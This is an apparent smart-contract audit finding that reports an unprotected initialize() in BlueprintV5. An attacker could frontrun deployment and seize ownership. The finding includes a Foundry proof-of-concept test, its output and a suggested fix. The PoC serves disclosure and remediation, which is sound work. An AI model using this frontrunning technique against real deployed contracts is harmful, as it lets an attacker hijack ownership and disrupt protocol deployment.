Nice Fossilized Fox

Medium

# Anyone can initialise BlueprintV5 contract

### Summary

Anyone can call BlueprintV5::initialize() to initialise the contract, allowing them to own the contract and upgrade it maliciously.

### Root Cause

In [`BlueprintV5.sol:15`](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintV5.sol#L15) there is no check for who is calling the function, so anyone can initialise the contract. When the contract is deployed, another call to initialize() must be made, which an attacker can frontrun to claim ownership of the contract.

### Internal Pre-conditions

1. Crestal network deploys the BlueprintV5 contract
2. Crestal network submits transaction to initialise the BlueprintV5 contract
3. An attacker frontruns the transaction, calling initialize() with higher gas to cause miners to include the attacker's transaction first.
4. Attacker initialises and becomes owner of the contract, allowing them to upgrade/selfdestruct it.

### External Pre-conditions

1. Admin deploys BlueprintV5 and initialises BlueprintV5 in separate transactions

### Attack Path

1. Crestal network deploys the BlueprintV5 contract
2. Crestal network submits transaction to initialise the BlueprintV5 contract
3. An attacker frontruns the transaction, calling initialize() with higher gas to cause miners to include the attacker's transaction first.
4. Attacker initialises and becomes owner of the contract, allowing them to upgrade/selfdestruct it.

### Impact

This is a griefing attack, DoSing the deployment of BlueprintV5, the attacker has minimal gain but harms the protocol as the contract will need to be redeployed.

### PoC


The below PoC shows an attacker calling initialize before the admin does, therefore owning the contract and the admin's transaction reverts.

```solidity
pragma solidity ^0.8.26;

import {Test, console} from "forge-std/Test.sol";
import {Vm} from "forge-std/Vm.sol";
import {BlueprintV5} from "../src/BlueprintV5.sol";
import {BlueprintCore} from "../src/BlueprintCore.sol";
import {Blueprint} from "../src/Blueprint.sol";
import {stdError} from "forge-std/StdError.sol";
import {MockERC20} from "./MockERC20.sol";

contract BlueprintTest is Test {
    BlueprintV5 public blueprint;
    MockERC20 public mockToken;
    bytes32 public projectId;
    address public workerAddress;
    address public dummyAddress;
    address public attacker = address(0x1337);

    function test_frontrun_init_contract() public {
        // blueprintV5 gets deployed
        blueprint = new BlueprintV5();

        // attacker initialises the contract before admin initialises it
        vm.startPrank(attacker);
        blueprint.initialize();
        vm.stopPrank();

        console.log("BlueprintV5 owner: %s", blueprint.owner());
        
        
        // admin's transaction to initialize the contract fails
        vm.expectRevert();
        blueprint.initialize();
    }

}
```

output after running `forge test --match-test test_frontrun_init_contract -vvv`
```bash
Ran 1 test for test/initialise_poc.sol:BlueprintTest
[PASS] test_frontrun_init_contract() (gas: 4932973)
Logs:
  BlueprintV5 owner: 0x0000000000000000000000000000000000001337
```

### Mitigation

Either call `initialize()` in the constructor, or set an `owner` address in the constructor and restrict `initialize()` to be only callable by the owner.